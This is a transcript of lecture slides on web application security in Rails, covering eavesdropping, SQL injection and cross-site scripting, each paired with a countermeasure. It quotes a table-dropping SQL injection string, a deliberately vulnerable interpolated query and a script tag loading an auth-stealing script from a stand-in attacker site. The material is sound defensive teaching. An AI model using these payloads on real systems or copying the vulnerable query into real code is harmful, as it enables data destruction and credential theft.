Security: Attacks & Countermeasures

Slides:



Advertisements
Similar presentations
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Advertisements

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
MongoDB Sharding and its Threats
Martin Kruliš by Martin Kruliš (v1.0)1.
Ruby on Rails CSCI 6314 David Gaspar Jennifer Garcia Avila.
PHP Security.
CSCI 6962: Server-side Design and Programming Course Introduction and Overview.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
COMPUTER SECURITY MIDTERM REVIEW CS161 University of California BerkeleyApril 4, 2012.
Ram Santhanam Application Level Attacks - Session Hijacking & Defences
Security (Keep your site secure at extension level) Sergey Gorstka Fastw3b.
Building Secure Web Applications With ASP.Net MVC.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
Web Security SQL Injection, XSS, CSRF, Parameter Tampering, DoS Attacks, Session Hijacking SoftUni Team Technical Trainers Software University
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.
SESSION HIJACKING It is a method of taking over a secure/unsecure Web user session by secretly obtaining the session ID and masquerading as an authorized.
4.01 How Web Pages Work.
ArcGIS for Server Security: Advanced
SQL Injection Attacks.
Database and Cloud Security
COMP9321 Web Application Engineering Semester 2, 2017
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Group 18: Chris Hood Brett Poche
Web Application Security
Building Secure ColdFusion Applications
CSE 154 Lecture 25: web security.
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Section 6.3 Server-side Scripting
Securing Your Web Application in Azure with a WAF
Chapter 7: Identifying Advanced Attacks
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Software Design.
Example – SQL Injection
Server Concepts Dr. Charles W. Kann.
SQL Injection Attacks Many web servers have backing databases
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Cross-Site Forgery
Security mechanisms and vulnerabilities in .NET
Using SSL – Secure Socket Layer
Lesson #8 MCTS Cert Guide Microsoft Windows 7, Configuring Chapter 8 Configuring Applications and Internet Explorer.
CSE 154 Lecture 26: web security.
Defense in Depth Web Server Custom HTTP Handler Input Validation
CSC 495/583 Topics of Software Security Intro to Web Security
Chapter 13 Security Methods Part 3.
Web Security Advanced Network Security Peter Reiher August, 2014
AppExchange Security Certification
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Security: Authentication & Authorization
Security: Exploits & Countermeasures
Databases and the MVC Model
Lecture 27 Security I April 4, 2018 Open news web sites.
Module 4 System and Application Security
4.01 How Web Pages Work.
Security and JavaScript
Presentation transcript:

Security: Attacks & Countermeasures http://xkcd.com/327/ Security: Attacks & Countermeasures

SWEBOK KAs covered so far Software Requirements Software Design Software Construction Software Testing Software Maintenance Software Configuration Management Software Engineering Management Software Engineering Process Software Engineering Models and Methods Software Quality Software Engineering Professional Practice Software Engineering Economics Computing Foundations Mathematical Foundations Engineering Foundations Today’s topic: Security

Three Common Web App Attacks and Countermeasures I’ll unfold them one by one…

What potential attack happens here? Ye Olde Internet Browser Rails Router Controller View Model DB

What potential attack happens here? Ye Olde Internet Browser Rails Router Controller View Model DB Eavesdropping, packet sniffing, man-in-the-middle

Example: Unsecured Sign-Up Page Trivial for packet sniffer to steal

How to prevent? Browser Ye Olde Internet Rails Router Controller View Model DB

Encrypt communications with SSL (HTTPS) How to prevent? Ye Olde Internet Browser Rails Router Controller View Model DB Encrypt communications with SSL (HTTPS)

How to enable site-wide SSL in Rails Also requires config on production server E.g.: Signed certificate Taken from https://www.railstutorial.org/book/ (3rd Ed.) Listing 7.26 See also http://guides.rubyonrails.org/configuring.html#rails-general-configuration

Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL

Why were the student records lost? http://xkcd.com/327/

Why were the student records lost? http://xkcd.com/327/ The name string “Robert'); DROP TABLE Students;--” injected malicious code But how can this happen?

Imagine controller that looks up students by name id = params[:id] # => "Robert" … Student.where("name = '#{id}'")

Imagine controller that looks up students by name id = params[:id] # => "Robert" … Student.where("name = '#{id}'") SELECT * FROM students WHERE name = 'Robert'; Rails ORM translates to…

What if…? id = params[:id] # => "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'")

What if…? id = params[:id] # => "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'") SELECT * FROM students WHERE name = 'Robert'; DROP TABLE students;--';

How to prevent SQL injection? id = params[:id] # => "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'")

How to prevent SQL injection? id = params[:id] # => "Robert'; DROP TABLE students;--" … Student.where("name = '#{id}'") Student.where("name = ?", id) Write like this! Automatically escapes input

Translation becomes… id = params[:id] # => "Robert'; DROP TABLE students;--" … Student.where("name = ?", id)

Translation becomes… id = params[:id] # => "Robert'; DROP TABLE students;--" … Student.where("name = ?", id) SELECT * FROM students WHERE name = 'Robert\'\; DROP TABLE students\;\-\-';

Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Attack: SQL injection Countermeasure: Use escaped queries

Micropost Example: What if…?

Micropost Example: What if…? User posts Blah blah… <script src="http://mallorysevilsite.com/authstealer.js">

Malicious script runs when feed loads! Blah blah… <script src="http://mallorysevilsite.com/authstealer.js">

How to prevent cross-site scripting (XSS)?

How to prevent cross-site scripting (XSS)? Use Rails! Hartl: “Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates.” <script src="http://mallorysevilsite.com/authstealer.js"> <script src="http://mallorysevilsite.com/authstealer.js"> ERB translates variable values to…

Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Attack: SQL injection Countermeasure: Use escaped queries Attack: Cross-site scripting (another type of injection) Countermeasure: Use Rails (escape text) Although these attacks are common, there are many more (e.g., cross-site request forgery – see Hartl Ch. 3)

CERT Top 10 Software Security Practices Validate input Heed compiler warnings Architect and design for security policies Keep it simple Default deny Adhere to the principle of least privilege Sanitize data sent to other software Practice defense in depth Use effective quality assurance techniques Adopt a software construction security standard US-CERT is the Computer Emergency Response Team for the United States Taken from https://www.securecoding.cert.org/

For more attacks and countermeasures, see the Rails Security Guide http://guides.rubyonrails.org/security.html

Summary Encrypting communication with SSL SQL injection attacks XSS attacks CERT security practices http://flic.kr/p/aCLor3

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.